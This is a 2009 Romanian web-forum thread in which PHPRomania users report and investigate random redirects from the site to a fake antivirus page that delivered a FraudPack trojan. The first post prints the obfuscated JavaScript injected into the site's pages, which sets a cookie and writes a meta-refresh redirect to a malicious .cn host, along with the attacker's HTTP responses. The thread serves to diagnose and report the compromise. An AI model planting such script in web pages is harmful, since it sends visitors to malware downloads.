~Virus~ pe pagina principala

Scrie sugestiile,părerile,criticile,ideile, comentariile referitoare la comunitate sau la forum.

Moderatori: admin, Moderatori

oceans
Senior Member
Mesaje: 504
Membru din: Mar Noi 13, 2007 3:06 pm

~Virus~ pe pagina principala

Mesajde oceans » Joi Sep 17, 2009 2:54 am

Nu stiu daca i s-a mai intamplat recent cuiva cand intra pe phpromania, sa i se faca redirect catre un alt site unde sa instaleze un ~anti-virus pentru ca sistemul nostru e sub pericol~. Mi s-a intamplat acum cateva zile si nu am crezut ca poate fi de la voi, mi-am facut un scan cu cel mai bun antivirus adica kaspersky si nimic de la mine. Astazi mai devreme iar aceiasi problema care nu-mi aparu a 2-a oara cand intrai pe site(btw folosesc IE 8 dar inca nu stiu daca conteaza pentru virusul asta). Stersai tot din cache din cookie, dec la net, si incercai inca odata de data asta cu httpanalyzer deschis si uitati antetele:

Antete Trimise scrie:GET / HTTP/1.1
Accept: application/x-silverlight, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: phpromania.net
Connection: Keep-Alive
Cookie: __utma=217314775.209756747.1253141400.1253141400.1253141400.1; __utmb=217314775; __utmz=217314775.1253141400.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)


Antete Primite scrie:HTTP/1.0 200 OK
Date: Tue, 15 Sep 2009 18:17:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Content-Encoding: gzip
Content-Length: 731
Connection: Keep-Alive


Continut primit:

Cod: Selectaţi tot

<script type="text/javascript" language="javascript">var hqrwa=new Date();hqrwa.setTime(hqrwa.getTime()+014*074*074*01750);document.cookie="\x6e_s\x65\x73\x73_\x69d\x3d\x63\x643f\x63\x34\x63\x66e\x39700ee\x30de\x34b\x35\x65c\x39\x340\x30c38e\x38"+"\x3b\x20pat\x68\075\x2f; \x65xpir\x65s="+hqrwa.toGMTString();</script> <script type="text/javascript" language="javascript">var bgpo=new Array("\x68\x74\x74p\x3a\x2f\x2fus\x64\x69s\x74\x75\x72\x62ed.\x63\x6e\x2f\x3f\x70\x69\x64\x3d\x318\x30\x73\x30\x31&si\x64\x3d\x33\x635\x37\x379");var elitzp="ca,co,\x64\x61,de\x2ccy,el\x2cen,e\x6f,es\x2cfi\x2cfr,\x67a,\x69t\x2cja\x2cji\x2ck\x6e,n\x6c,\x6eo,\x70t,\x73v";var ypukog=navigator.language||navigator.systemLanguage;var lang=ypukog.toLowerCase();lang=lang.substr(0,2);if(elitzp.indexOf(lang)==-1){fcok();}else{var rpygwij=Math.floor(Math.random()*bgpo.length);pynidzq(bgpo[rpygwij]);}function pynidzq(ygmxwhh){document.writeln("\x3cME\x54\x41 H\x54TP-EQU\x49V=\047Re\x66res\x68\047\x20\x43ONT\x45N\x54=\0470;\x20UR\x4c="+ygmxwhh+"\047\x3e");document.writeln("\x3cmeta \x68\x74t\x70\055\x65quiv\x3d\047\x70r\x61gma\x27 c\x6fnt\x65nt\x3d\047no-\x63a\x63h\x65\047\076");document.writeln("\074meta na\x6d\145\x3d\047\x72ob\x6fts\047 con\x74en\x74=\047noi\x6ede\x78,n\x6ff\x6fll\x6fw\x27>");}function fcok(){return;}</script>


Din codul de mai sus o sa vedeti ca se seteaza un cookie care probabil ulterior ii ajuta pe ei sa verifice cine esti, si se scrie un meta de redirect catre HOST: usdisturbed.cn

Virus antete Trimise scrie:GET /?pid=180s01&sid=3c5779 HTTP/1.1
Accept: application/x-silverlight, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: usdisturbed.cn
Connection: Keep-Alive


Virus antete Primite scrie:HTTP/1.0 302 Moved Temporarily
Date: Wed, 16 Sep 2009 21:21:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Set-Cookie: red=1; expires=Thu, 17-Sep-2009 21:21:24 GMT
Location: http://delete-all-virus05.com/scan1/?pi ... UxMMMOPAhN
Content-Type: text/html
Connection: close


Continut pagina virus partial:

Cod: Selectaţi tot

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>My computer On-line Scanner</title>



Eu zic sa verificati sursele, faceti un scan, investigati si sunt curios ce o sa gasiti. Daca nu reusiti nimic schimbati hostul.



Pirahna
Senior Member
Mesaje: 5985
Membru din: Dum Aug 22, 2004 2:04 am
Localitate: la birou
Contact:

Mesajde Pirahna » Joi Sep 17, 2009 3:36 am

Mie nu mi s-a intamplat.

Avatar utilizator
Ctek
Senior Member
Mesaje: 310
Membru din: Dum Oct 05, 2008 12:05 am
Contact:

Mesajde Ctek » Vin Sep 18, 2009 2:14 am

Acelasi lucru l-am patit si eu dar nu numai pe pagina principala ci si pe topicuri.
Se intampla cam din 3 topicuri accesate 1 sa fie un redirect sau sa se blocheze accessul si imi apare "Page redirected click here to ...."

Mi-am scanat sistemele si nu am gasit nimic, dar e posibil sa fie afectate anumite retele (?) sau prin ce proxy iesi (?)

Am uitat sa mentionez ca se manifesta atat pe IE 8 cat si pe FF 3.5 cat si pe Opera 10. de aici trag concluzia ca nu tine de browser ci mai mult de SO sau o deturnare de DNS.

oceans
Senior Member
Mesaje: 504
Membru din: Mar Noi 13, 2007 3:06 pm

Mesajde oceans » Vin Sep 18, 2009 4:55 am

Da am observat si pe forum acum la cateva topicuri, deci nu e de la utilizatori adica de la noi ci de la server, trebuie studiata problema de adminii siteului, in surse php, htaccess, poate direct in apache, sau cum zici tu in zonele dns or fi fost adugate niste inregistrari care duc catre alte ip-uri, etc.
Sunt curios daca cineva care poate sa rezolve ceva a citit topicul asta :)

Avatar utilizator
Birkoff
Senior Member
Mesaje: 6380
Membru din: Joi Mar 18, 2004 2:34 pm
Localitate: Bucuresti
Contact:

Mesajde Birkoff » Vin Sep 18, 2009 5:42 am

ar fi de ajutor daca dati mai multe detalii, link pagina, ca sa putem verifica...
1) CMS, ERP, CRM, etc... (doar pentru clienti))
2) Portofoliu, servicii, contact, blog
3) Folositi aceasta clasa sql in proiectele voastre (open source)
4) Vrei un magazin virtual la cheie, usor de folosit, cu api-uri incluse pentru maximizarea vanzarilor si multe alte facilitati? Da un semn si discutam.

oceans
Senior Member
Mesaje: 504
Membru din: Mar Noi 13, 2007 3:06 pm

Mesajde oceans » Vin Sep 18, 2009 5:59 am

In primul meu post am dat toate detaliile deci GET / si pe pagina principala daca aveti index.php ca index atunci aia e pagina si Host: phpromania.net, nu stiu ce sa dau in plus, poate sa fac un video in timp ce mi se intampla ?
Am mai observat ceva, acum sunt pe Zapp si nu mi s-a intamplat deloc, insa pe Orange bingo...

// LE: Rectific, si pe Zapp imi aparu, deci nu cred ca conteaza asta. Poate sa mai confirme cineva, sau doar mie si lui Ctek ne-a aparut ?

Avatar utilizator
Birkoff
Senior Member
Mesaje: 6380
Membru din: Joi Mar 18, 2004 2:34 pm
Localitate: Bucuresti
Contact:

Mesajde Birkoff » Vin Sep 18, 2009 12:39 pm

ce antivirus a raportat alerta si ce tip de virus (numele virusului)?
intreb pentru ca de ieri am dat sa scaneze toate paginile site-ului si inca nu a gasit nimic...
banuiesc ca intra ceva printr-una din reclamele externe, dar inca nu m-am dumirit care din reclame deoarece la mine inca nu a tipat antivirusul...
1) CMS, ERP, CRM, etc... (doar pentru clienti))
2) Portofoliu, servicii, contact, blog
3) Folositi aceasta clasa sql in proiectele voastre (open source)
4) Vrei un magazin virtual la cheie, usor de folosit, cu api-uri incluse pentru maximizarea vanzarilor si multe alte facilitati? Da un semn si discutam.

Avatar utilizator
darkyndy
Senior Member
Mesaje: 295
Membru din: Vin Mar 27, 2009 3:35 pm
Localitate: Iasi
Contact:

Mesajde darkyndy » Vin Sep 18, 2009 1:41 pm

Eu nu am patit asa ceva pana acum, dar pe mine ma ajuta:
- FireFox 3.5.1 unde am AddBlockPlus (cu multe filtre prin care nu vad nici o reclama), FlashBlock (unde nu permit sa se incarce flash-urile);
- Avira Premium (last version cu licenta) care are Web Guard;
- S.O. folosit Windows 7 Pro RTM (cu licenta).
There are 10 kinds of people in the world, those who understand binary, and those who don't.
Auto embed video from link

Avatar utilizator
Ctek
Senior Member
Mesaje: 310
Membru din: Dum Oct 05, 2008 12:05 am
Contact:

Mesajde Ctek » Vin Sep 18, 2009 2:46 pm

@Birkoff

Vad ca de la servici nu se manifesta... Avem Euroweb.
Tot ce am putut observa este ca de acasa unde am RDS se tot manifesta eroarea. Nu tine de Pc-ul de unde se acceseaza si asa ma gandesc ca este o problema de la carrier.

Daca dai refresh dupa ce apare mesajul de pagina redirectata te trimite catre topicul dorit.

Am intrebat niste prieteni care mi-au spus de un nou virus care afecteaza "DNS" requests dar nu cred inca :D

Poate sunt niste erori in DNS dar sincer nu prea imi pot da seama exact. Antivirusul nu a sesizat nimic. folosesc suita F-Secure si la servici si acasa, atat pe desktopuri cat si pe srv-uri + pe laptop.
Sistemul este Win 7. si Win Vista (toate ok dpdv licenta).
Nu am testat pe Linux dar o sa incerc.

In concluzie.

- Redirectarea apare random.
- In principiu se manifesta cand providerul este RDS.
- Nu se semnaleaza nimic de catre antivirusul instalat pe client.
- Nu exista un topic anume unde sa se reproduca.
- se manifesta numai pe forumul PHPRomania
am sa incerc sa fac print-screen la eroare.

Ciudat este ca prima oara redirectarea este catre o pagina "fake" de antivirus care scaneaza apoi la manifestari ulterioare apare doar mesajul cu " The page has been redirected. Click here to .... bla bla".

Sper sa nu fie vre-un virus de client care inca nu e recunoscut ... :|

Daca mai apare va rog sa semnalati:
- Pagina accesata,
- Linkul paginii redirectate
- ISP-ul folosit
si daca se poate o captura de ecran.

ebogdan
Senior Member
Mesaje: 218
Membru din: Joi Iul 27, 2006 2:45 pm
Localitate: Constanta

Mesajde ebogdan » Vin Sep 18, 2009 3:19 pm

Dacă ai XP încearcă în linia de comandă:

Cod: Selectaţi tot

net stop dnscache
, apoi vezi dacă îți mai apare.
Eventual și un

Cod: Selectaţi tot

ping windowsupdate.microsoft.com
înainte să oprești dnscache. Dacă nu îți rezolvă domeniul, e o variantă mai nouă de hybrid conficker/downup.

Avatar utilizator
Birkoff
Senior Member
Mesaje: 6380
Membru din: Joi Mar 18, 2004 2:34 pm
Localitate: Bucuresti
Contact:

Mesajde Birkoff » Vin Sep 18, 2009 3:23 pm

am deja 9 ore si 21 minute de cand scanez online fiecare pagina din forum si de pe site... si inca nu am gasit nimic...
folosesc firefox ultima versiuni, avg ca antivirus, comodo ca firewal, doctor web ca protectie suplimentara in browser, am windows xp 64 bit si provider ies prin rds (printr-un ruter care are si el firewal)
nu am gasit pana acum nimic in neregula dar mai investighez... oricum daca va mai apare ar fi bine link, prinscreen sau orice ar putea ajuta la detectarea problemei...
1) CMS, ERP, CRM, etc... (doar pentru clienti))
2) Portofoliu, servicii, contact, blog
3) Folositi aceasta clasa sql in proiectele voastre (open source)
4) Vrei un magazin virtual la cheie, usor de folosit, cu api-uri incluse pentru maximizarea vanzarilor si multe alte facilitati? Da un semn si discutam.

Avatar utilizator
Amenthes
Senior Member
Mesaje: 1370
Membru din: Lun Dec 12, 2005 8:00 am
Contact:

Mesajde Amenthes » Vin Sep 18, 2009 9:30 pm

Se confirma si la mine.

Am dezactivat din intamplare JavaScript pentru ca statea prea mult sa se
incarce o pagina de pe forum din cauza script-ului de Trafic. Am incercat
apoi sa merg pe home page si tot ceea ce aparea in view source era asta:

Cod: Selectaţi tot

<script type="text/javascript" language="javascript"> var lclbi=new Date( ); lclbi.setTime(lclbi.getTime( )+014*074*074*01750); document.cookie="n\x5f\x73e\x73\x73\x5f\x69\x64\x3d\x38dbd07\x33\x64c24b\x64\x378\x32\x31c\x33\x35\x34\x332\x37\x35\x33032ef\x62"+"\x3b\x20pat\x68\075\x2f; \x65xpir\x65s="+lclbi.toGMTString( ); </script>


Care s-ar traduce in mare prin asta:

Cod: Selectaţi tot

n_sess_id=8dbd073dc24bd7821c35432753032efb; path=/; expires=
I'm under construction | http://igstan.ro

oceans
Senior Member
Mesaje: 504
Membru din: Mar Noi 13, 2007 3:06 pm

Mesajde oceans » Sâm Sep 19, 2009 4:00 am

Virusul nu este pe site, am trecut virus in titlu deoarece noi utilizatorii e posibil sa luam virusi pentru ca de pe phpromania te redirectioneaza(vedeti primul post cu continul returnat in cod javascript obufscat) pe un host unde exista virusul fizic. Mi s-a intamplat din nou acum si kaspersky m-a alertat:
\Windows\TEMPORARY INTERNET FILES\Content.IE5\AWOPZNC9\Soft_180s3[1].exe

Trojan.Win32.FraudPack.tvr

Deci, inca nu am avut timp sa vad daca sunt aceleasi ip-uri si daca e o problema de dns, dar adminii pot foarte simplu sa studieze zonele dns sa vada daca e totul ok. Apoi fisierul de index unde am observat prima data din site si acum in forum la topicuri random trebuie studiate si ele. Asta doar pentru a vedea de unde vine, dar trebuie studiat cum de atacatorul a putut face asta adica ori a spart serverul, ori a obtinut datele de logare a vreunui admin(verificati logurile de access ftp), ori este vreo vulnerabilitate in codul php al site-ului. Atacatorul a schimbat acum hostul siteului de unde te poti infecta in windowsprotection-8.com deci asta arata ca poate face modificari oricand vrea, deci e grava situatia cred eu.

Uite niste screen shots, pe care le-am facut in timp ce am intrat pe mai multe topicuri:

Imagine
Imagine
Imagine
Imagine

dar nu ajuta la nimic, doar sa vedeti ca asa se intampla in caz ca nu ne credeti, desi am pus destule informatii in primul post. Cum am mai zis in toata pagina afectata apare doar codul javascript care seteaza niste meta de redirect, deci nu e de la banner, iar faptul ca unora nu li se intampla nu cred ca e pentru ca au browsere mai bune sau antivirus mai bun( eu unul am windows vista cu sp2 kaspersky is ie8 cu toate update-urile la zi).... Eu nu am destule informatii ca sa trag vreo concluzie, dar sunt sigur ca daca studiati fisierele manual, o sa gasiti sigur ceva.

Pirahna
Senior Member
Mesaje: 5985
Membru din: Dum Aug 22, 2004 2:04 am
Localitate: la birou
Contact:

Mesajde Pirahna » Sâm Sep 19, 2009 6:27 am

Mi-a aparut si mie dar ... doar o pagina alba (care avea ca sursa codul ala js).
Mie nu mi-a facut redirect, afisat ceva ... doar pagina alba.

Avatar utilizator
darkyndy
Senior Member
Mesaje: 295
Membru din: Vin Mar 27, 2009 3:35 pm
Localitate: Iasi
Contact:

Mesajde darkyndy » Sâm Sep 19, 2009 9:05 am

Pirahna scrie:Mi-a aparut si mie dar ... doar o pagina alba (care avea ca sursa codul ala js).
Mie nu mi-a facut redirect, afisat ceva ... doar pagina alba.


Asta am patit-o si eu pe diferite topicuri ... am crezut ca e de la net (am dat F5 si s-a incarcat topicul), nu m-am uitat la codul sursa.
There are 10 kinds of people in the world, those who understand binary, and those who don't.

Auto embed video from link


Înapoi la “Feedback PHPRomania”

Cine este conectat

Utilizatori ce ce navighează pe acest forum: Niciun utilizator înregistrat și 20 vizitatori